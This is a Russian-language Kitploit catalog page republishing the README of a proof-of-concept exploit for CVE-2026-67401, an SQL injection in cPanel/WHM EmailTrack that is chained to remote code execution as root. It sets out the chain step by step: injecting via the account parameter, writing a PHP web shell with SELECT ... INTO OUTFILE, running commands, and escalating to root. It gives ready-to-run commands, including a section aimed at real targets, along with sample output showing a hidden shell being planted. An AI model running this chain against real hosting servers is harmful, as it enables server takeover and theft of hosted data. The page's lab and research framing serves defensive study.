Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-67401 — Proof-of-concept для CVE-2026-67401 — SQL-инъекция в cPanel/WHM EmailTrack, позволяющая произвольную запись файлов и RCE с правами root, с пробами для обнаружения SQLi и самодостаточной уязвимой лабораторией. | Kitploit
Инструменты/GitHubGitHub/imbas007/cve-2026-67401
Сканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubimbas007/cve-2026-67401

CVE-2026-67401

Proof-of-concept для CVE-2026-67401 — SQL-инъекция в cPanel/WHM EmailTrack, позволяющая произвольную запись файлов и RCE с правами root, с пробами для обнаружения SQLi и самодостаточной уязвимой лабораторией.

532620 дней назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-67401 — SQL-инъекция в EmailTrack cPanel/WHM → RCE с правами root

CVE Severity Platform Python

Proof-of-concept для CVE-2026-67401 — критической уязвимости SQL-инъекции в функциональности EmailTrack cPanel & WHM, позволяющей аутентифицированному пользователю с привилегиями, связанными с почтой, записывать произвольные файлы и выполнять код с правами root.

Обнаружено: Ali Mustafa Раскрыто: 8 сентября 2026 г. Компонент: EmailTrack (логирование / отслеживание доставки почты)


Уязвимые версии

Уязвимы версии ниже исправленных сборок.

Серия сборок cPanelИсправленная версия
11.11011.110.0.143
11.13411.134.0.55
11.13611.136.0.39
11.13811.138.0.4
WP2 (11.138)11.138.1.9

Проверить свою версию можно командой:

cat /usr/local/cpanel/version

Цепочка эксплуатации

┌─────────────┐      ┌────────────┐      ┌─────────┐      ┌──────────┐
│ Auth as     │ ───► │ SQLi in    │ ───► │ INTO    │ ───► │ RCE as   │
│ cPanel user │      │ EmailTrack │      │ OUTFILE │      │ root     │
│ (mail priv) │      │ API call   │      │ (shell) │      │          │
└─────────────┘      └────────────┘      └─────────┘      └──────────┘
  1. Аутентифицируйтесь в cPanel с учётной записью, имеющей привилегии на почту.
  2. Внедрите инъекцию через параметр account в EmailTrack.
  3. Запишите PHP-веб-шелл с помощью SELECT ... INTO OUTFILE в public_html/.
  4. Выполните команды через шелл.
  5. Повысьте привилегии через SUID-бинарники cPanel, cron или очередь задач.

Содержимое репозитория

ФайлОписание
poc_sqli.pyОбнаружение SQL-инъекции: boolean-based, time-based и подсчёт столбцов через UNION
poc_full_chain.pyПолная цепочка эксплуатации: SQLi → веб-шелл через INTO OUTFILE → RCE → рекомендации по получению root
lab/vuln_server.pyЛокальная симуляция уязвимого бэкенда EmailTrack (безопасная, самодостаточная)
README.mdЭтот документ

Входящая в комплект лаборатория позволяет запустить и проверить всю цепочку без реального сервера cPanel.


Требования

  • Python 3.8+
  • Сторонние пакеты не требуются — всё использует стандартную библиотеку.

Использование

Все команды выполняются из корня репозитория.

1. Запуск локальной лаборатории

python3 lab/vuln_server.py 18123 lab/htdocs
  • Учётные данные: alice / s3cr1t
  • Эмулирует: вход через UAPI, уязвимый запрос EmailTrack, SLEEP(), INTO OUTFILE и выполнение PHP-веб-шелла.
  • Аргумент 1: порт (по умолчанию 18123)
  • Аргумент 2: корень документов (по умолчанию lab/htdocs)

Оставьте это работать в одном терминале и используйте второй терминал для PoC.

2. Обнаружение SQL-инъекции

python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode detect
АргументОписание
-H, --hostХост cPanel, например https://cp.example.com:2083
-u, --usernameУчётная запись cPanel с привилегиями на почту
-p, --passwordПароль учётной записи
--paramИнъецируемый параметр (по умолчанию: account)
--modedetect (по умолчанию), boolean, timing, union или all
--sleepДлительность SLEEP() для time-based проверки (по умолчанию: 3.0)
--dump-versionПопытаться извлечь версию СУБД через UNION
--insecureПропустить проверку TLS-сертификата

Запуск конкретной проверки:

# UNION column count only
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode union

# Time-based only, 5-second delay
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode timing --sleep 5

3. Полная цепочка эксплуатации

CPANEL_USER=alice CPANEL_PASS='s3cr1t' \
  python3 poc_full_chain.py http://127.0.0.1:18123 \
  --shell-base http://127.0.0.1:18123
Аргумент / переменная окруженияОписание
host (позиционный)Хост cPanel или переменная окружения CPANEL_HOST
CPANEL_USERУчётная запись cPanel с привилегиями на почту
CPANEL_PASSПароль учётной записи
--shell-baseБазовый URL, обслуживающий public_html (где доступен веб-шелл)
--insecureПропустить проверку TLS-сертификата
--no-escalateОстановиться после RCE; пропустить рекомендации по получению root
SHELL_NAME (переменная окружения)Имя файла веб-шелла (по умолчанию: .mail.cache.php)

Этапы, выполняемые автоматически:

  1. Аутентификация в cPanel
  2. Подтверждение SQL-инъекции (boolean + time-based)
  3. Определение количества столбцов в запросе через UNION
  4. Запись PHP-веб-шелла с помощью SELECT ... INTO OUTFILE
  5. Выполнение команд через шелл (id, whoami, перечисление SUID, …)
  6. Вывод рекомендаций по получению root (SUID whmapi1, cron, очередь задач)

4. Против реальной цели

# Detection
python3 poc_sqli.py -H https://cp.example.com:2083 -u user -p 'pass' \
  --insecure --mode detect

# Full chain (--shell-base is the account's web host, not the cPanel port)
CPANEL_USER=user CPANEL_PASS='pass' \
  python3 poc_full_chain.py https://cp.example.com:2083 \
  --shell-base https://cp.example.com --insecure

Примечание: значение --shell-base по умолчанию удаляет из хоста порт, используемый только cPanel (2082/2083). Если корень документов обслуживается на другом порту, укажите его явно.


Проверенные результаты

Вывод, полученный на входящей в комплект лаборатории:

  CVE-2026-67401  cPanel/WHM EmailTrack SQLi -> File Write -> RCE
  version 1.0

  target: http://127.0.0.1:18123
  user:   alice
  [+] authenticated
  [1] confirming SQL injection in EmailTrack `account`
  [+] boolean-based SQLi CONFIRMED
  [+] time-based SQLi CONFIRMED (SLEEP(2) -> 6.0s)
  [2] determining column count via UNION
  [+] target query has 5 columns
  [3] writing PHP web shell via SELECT ... INTO OUTFILE
  [+] shell written -> /home/alice/public_html/.mail.cache.php
  [4] executing commands through the web shell
  [+] id -> uid=1000(x) gid=1000(x) ...

Ссылки

  • Critical cPanel SQL Injection Lets Attackers Grab Root Access — The Daily Tech Feed
  • cPanel Security Advisory: CVE-2026-67401
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command

Лицензия

Выпущено в образовательных целях и для авторизованных исследований в области безопасности. Перед использованием см. Отказ от ответственности.

Скачать инструмент